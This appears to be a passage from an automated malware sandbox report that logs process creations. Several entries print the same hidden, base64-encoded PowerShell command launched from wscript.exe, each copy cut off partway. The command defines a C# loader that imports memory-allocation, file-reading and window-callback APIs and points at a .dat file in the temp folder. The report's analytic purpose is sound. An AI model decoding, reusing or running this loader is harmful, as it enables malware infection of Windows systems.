"IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdline	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD18D.tmp" "c:\Users\user\AppData\Local\Temp\CSC3851A02150B343D6B4C9C6BEA8107533.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0A